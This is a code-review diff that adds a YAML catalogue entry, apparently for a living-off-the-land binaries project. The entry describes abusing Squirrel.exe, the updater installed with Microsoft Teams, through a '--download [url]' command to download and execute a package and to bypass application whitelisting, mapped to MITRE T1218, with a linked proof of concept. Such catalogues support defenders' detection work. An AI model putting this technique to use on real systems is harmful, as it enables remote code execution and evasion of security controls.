Merge pull request #38 from jreegun/patch-1

Create squirrel.yml

yml/OtherMSBinaries/squirrel.yml

@@ -0,0 +1,47 @@
+Name: squirrel.exe
+Description: Binary to update the existing installed Nuget/squirrel package
+Author: User
+Created: Installed date
+Commands:
+  - Command: squirrel.exe --download [url to package]
+    Description: The above binary will go that particular location and look for RELEASES file and download the nuget package.
+    Usecase: Download and execute binary
+    Category: Execute
+    Privileges: User Privilege
+    MitreID: T1218 
+    MitreLink: https://attack.mitre.org/techniques/T1218/
+    OperatingSystem: Windows OS
+  - Command: squirrel.exe --download [url to package]
+    Description: The above binary will go that particular location and look for RELEASES file and download the nuget package.
+    Usecase: Download and execute binary
+    Category: AWL Bypass
+    Privileges: User Privilege
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/techniques/T1218/
+    OperatingSystem: Windows 10
+  - Command: squirrel.exe --download [url to package]
+    Description: The above binary will go that particular location and look for RELEASES file and download the nuget package.
+    Usecase: Download and execute binary
+    Category: Download
+    Privileges: User Privilege
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/techniques/T1218/
+    OperatingSystem: Windows 10
+Full_Path:
+- Path: NA
+- Path: %localappdata%\Microsoft\Teams\current\Squirrel.exe
+Code_Sample: 
+- Code: https://github.com/jreegun/POC-s/tree/master/nuget-squirrel
+Detection: 
+- IOC: NA
+- IOC: NA
+Resources:
+ - Link: https://www.youtube.com/watch?v=rOP3hnkj7ls
+ - Link: https://twitter.com/reegun21/status/1144182772623269889
+ - Link: NA
+ Acknowledgement:
+  - Person: Reegun J (OCBC Bank)
+    Handle: @reegun21
+  - Person: NA
+    Handle: NA
+---